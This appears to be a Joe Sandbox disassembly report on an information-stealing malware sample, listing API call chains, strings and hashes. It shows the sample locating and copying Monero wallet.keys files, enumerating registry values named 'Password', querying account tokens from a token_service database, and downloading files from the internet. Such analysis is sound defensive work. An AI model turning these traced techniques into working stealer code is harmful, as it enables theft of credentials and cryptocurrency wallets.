                                        • lstrlen.KERNEL32(00000000), ref: 0092532F
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                                        • lstrlen.KERNEL32(00000000), ref: 00925383
                                        • lstrlen.KERNEL32(00000000), ref: 009253AE
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: c9caeaa704cfe3221df1a42c33b92f84c45db4d2da0e49c7b5170678eeb76614
                                        • Instruction ID: 9ed701f02de49cd2742bcb3dd83863a51d0ddbaad037feba2ac628b2ad63875b
                                        • Opcode Fuzzy Hash: c9caeaa704cfe3221df1a42c33b92f84c45db4d2da0e49c7b5170678eeb76614
                                        • Instruction Fuzzy Hash: 97514F31911158ABCB18FF60ED92FED7779AF94300F504018F9066B1A6EF346B46CBA6
                                        APIs
                                          • Part of subcall function 009112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                                          • Part of subcall function 009112A0: RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                                          • Part of subcall function 009112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                                          • Part of subcall function 009112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                                          • Part of subcall function 009112A0: RegCloseKey.ADVAPI32(?), ref: 009112FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 0091134F
                                        • lstrlen.KERNEL32(?), ref: 0091135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00911377
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00911465
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                        • DeleteFileA.KERNEL32(00000000), ref: 009114EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 412bb9d3af2aae852ad041399929d41b68da8a5b203cd20e571937cd8813b98c
                                        • Instruction ID: e8c9e9a3b4c1d6ca09ca13f13a6f234b34e30260036b135dffee4198de570190
                                        • Opcode Fuzzy Hash: 412bb9d3af2aae852ad041399929d41b68da8a5b203cd20e571937cd8813b98c
                                        • Instruction Fuzzy Hash: D95137B2D5012957CB15FB60ED92FED737CAF94300F4045D8B60A62096EE706B89CFA6
                                        APIs
                                          • Part of subcall function 009172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                                          • Part of subcall function 009172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                                          • Part of subcall function 009172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                                          • Part of subcall function 009172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                                          • Part of subcall function 009172D0: HeapFree.KERNEL32(00000000), ref: 00917459
                                        • lstrcat.KERNEL32(00000000,009317FC), ref: 00917606
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00917648
                                        • lstrcat.KERNEL32(00000000, : ), ref: 0091765A
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091768F
                                        • lstrcat.KERNEL32(00000000,00931804), ref: 009176A0
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 009176D3
                                        • lstrcat.KERNEL32(00000000,00931808), ref: 009176ED
                                        • task.LIBCPMTD ref: 009176FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                                        • Instruction ID: 054c69c8d0a0dcaa48e31ad8daf03caf5af101b4a06718984245acbdf2332e3b
                                        • Opcode Fuzzy Hash: 29fe1ddd90e6c59cd65fe4383f0a2a6b574e4026fb316e1814985147b63828c8
                                        • Instruction Fuzzy Hash: F0312F72A04209EBCB04EBE4DC55EEF7775AB85302B144658E102B7160DE34A986DB52
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006BDF00,00000000,?,00930E2C,00000000,?,00000000), ref: 00928130
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00928137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00928158
                                        • __aulldiv.LIBCMT ref: 00928172
                                        • __aulldiv.LIBCMT ref: 00928180
                                        • wsprintfA.USER32 ref: 009281AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                                        • Instruction ID: 3ce7f2e618f87c28c0a59267513e8a838ea814e13cadd934e54ebdc8ab6693ce
                                        • Opcode Fuzzy Hash: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                                        • Instruction Fuzzy Hash: FC21FCB1945218ABDB00DFD4DC49FAFB7B8FB44715F104609F605BB284DB7859018BA5
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                        • InternetOpenA.WININET(00930DF7,00000001,00000000,00000000,00000000), ref: 0091610F
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916147
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0091618F
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009161B3
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 009161DC
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0091620A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00916249
                                        • InternetCloseHandle.WININET(?), ref: 00916253
                                        • InternetCloseHandle.WININET(00000000), ref: 00916260
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                                        • Instruction ID: 6ba02c49d1d89c85062aaaba2107566fdccb0f2db0134fb47687623ee7416a2e
                                        • Opcode Fuzzy Hash: 6fece53fb681cf9e26112b05c29e2bd61b14b891662da81a55d0a98b0e00bd3e
                                        • Instruction Fuzzy Hash: 00513BB1A0021CABDB20DFA0DC59BEE77B8EB48705F108598E605A71C1DB746E89CF95
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0091733A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009173B1
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0091740D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00917452
                                        • HeapFree.KERNEL32(00000000), ref: 00917459
                                        • task.LIBCPMTD ref: 00917555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                                        • Instruction ID: def5ce88940f58f1aabf1e2d5e148ac5dc4e22ef087e0a7c9a22b7ec5d015e49
                                        • Opcode Fuzzy Hash: b0f42de98a81a6522f88d982d2c52157b63305aa5ddf3171e2f93f37d2841f30
                                        • Instruction Fuzzy Hash: 18613CB5A0426D9BDB24DB50CC51BDAB7B9BF88300F0081E9E649A6181DF745FC9CFA0
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,006BDB80,00000000,00020119,?), ref: 009240F4
                                        • RegQueryValueExA.ADVAPI32(?,006BE1D0,00000000,00000000,00000000,000000FF), ref: 00924118
                                        • RegCloseKey.ADVAPI32(?), ref: 00924122
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924147
                                        • lstrcat.KERNEL32(?,006BE350), ref: 0092415B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValue
                                        • String ID: Pk$k
                                        • API String ID: 690832082-364392430
                                        • Opcode ID: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                                        • Instruction ID: f6ad910a75ef1c272c20282cca9718f7b528261db83c42ee5a854704c2de1b8c
                                        • Opcode Fuzzy Hash: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                                        • Instruction Fuzzy Hash: 68418BB6D1020C6BDB14EBA0EC56FFE773DAB8C300F004598B71657185EE755B888B92
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        • lstrlen.KERNEL32(00000000), ref: 0091BC9F
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0091BCCD
                                        • lstrlen.KERNEL32(00000000), ref: 0091BDA5
                                        • lstrlen.KERNEL32(00000000), ref: 0091BDB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                                        • Instruction ID: 3c51e9cdb52a3b4134136bdb5b81dfcd13fdb927a7259aa7e987a337a20ff8b5
                                        • Opcode Fuzzy Hash: 9278b3981043cac3a68f7ebb3e08a50d8c67485b1f8e75a07a4e1deb7b2d21cb
                                        • Instruction Fuzzy Hash: CAB11F769101189BDB04FBA0ED96FEE733DAF94300F404568F506B7096EF346A49CBA6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                                        • Instruction ID: 3c78edfea26c59d734225bb960f3449e5e79bd03828ab1ced10eb525945afd0c
                                        • Opcode Fuzzy Hash: a4cf0537ff5dca658b5be21a54ae98922fa096b8cd3a29386fda724568e7e9f1
                                        • Instruction Fuzzy Hash: FEF05830908399EFD344AFE0E909B2CBF74FB08703F0402D8E609A7690EA705F419B96
                                        APIs
                                        • lstrcat.KERNEL32(?,006BE458), ref: 009247DB
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00924801
                                        • lstrcat.KERNEL32(?,?), ref: 00924820
                                        • lstrcat.KERNEL32(?,?), ref: 00924834
                                        • lstrcat.KERNEL32(?,006AB608), ref: 00924847
                                        • lstrcat.KERNEL32(?,?), ref: 0092485B
                                        • lstrcat.KERNEL32(?,006BDAE0), ref: 0092486F
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
